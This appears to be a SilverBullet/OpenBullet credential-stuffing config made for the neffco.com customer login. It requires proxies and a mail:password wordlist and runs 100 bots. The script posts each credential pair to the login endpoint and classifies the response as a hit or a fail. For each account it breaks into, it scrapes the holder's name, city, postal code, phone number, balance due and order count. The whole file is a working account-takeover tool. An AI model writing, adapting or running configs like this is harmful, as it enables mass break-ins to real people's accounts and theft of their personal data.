[SETTINGS]
{
  "Name": "neffco",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-12-31T21:18:50.5099377+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "neffco",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#USER FUNCTION URLEncode "<USER>" -> VAR "USER" 

#PASS FUNCTION URLEncode "<PASS>" -> VAR "PASS" 

#LOGIN REQUEST POST "https://www.neffco.com/index/page/login" 
  CONTENT "actions%5BAuthenticationModule%5D=authenticate&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.neffco.com" 
  HEADER "Origin: https://www.neffco.com" 
  HEADER "Referer: https://www.neffco.com/index/page/login" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect Email/Password." 
  KEYCHAIN Success OR 
    KEY "Account Information" 

#CAPTURE REQUEST GET "https://www.neffco.com/index/page/edit_billing" 
  
  HEADER "Host: www.neffco.com" 
  HEADER "Referer: https://www.neffco.com/index/page/myaccount" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

#FN PARSE "<SOURCE>" LR "[first_name]\" value=\"" "\"" CreateEmpty=FALSE -> CAP "FN" 

#LN PARSE "<SOURCE>" LR "[last_name]\" value=\"" "\"" CreateEmpty=FALSE -> CAP "LN" 

#CITY PARSE "<SOURCE>" LR "name=\"update_fields[Contact][contact_information][city]\" value=\"" "\"" CreateEmpty=FALSE -> CAP "CITY" 

#ZIPCODE PARSE "<SOURCE>" LR "[postal_code]\" value=\"" "\"" CreateEmpty=FALSE -> CAP "ZIPCODE" 

#PHONE_NB PARSE "<SOURCE>" LR "name=\"update_fields[Contact][contact_information][phone]\" value=\"" "\"" CreateEmpty=FALSE -> CAP "PHONE NB" 

#CAPTURE2 REQUEST GET "https://www.neffco.com/index/page/myaccount" 
  
  HEADER "Host: www.neffco.com" 
  HEADER "Referer: https://www.neffco.com/index/page/login" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

#balance PARSE "<SOURCE>" LR "<span>Balance Due: </span>" "</span>" -> VAR "balance" 

#balance FUNCTION Replace "<span>" "" "<balance>" -> CAP "balance" 

#orders PARSE "<SOURCE>" LR "<span># of Orders: </span>" "</span>" -> VAR "orders" 

#orders FUNCTION Replace "<span>" "" "<orders>" -> CAP "orders" 

#FREE KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<balance>" EqualTo "($0.00)" 
    KEY "<orders>" EqualTo "0" 
  KEYCHAIN Success OR 
    KEY "<balance>" NotEqualTo "($0.00)" 
    KEY "<orders>" NotEqualTo "0" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

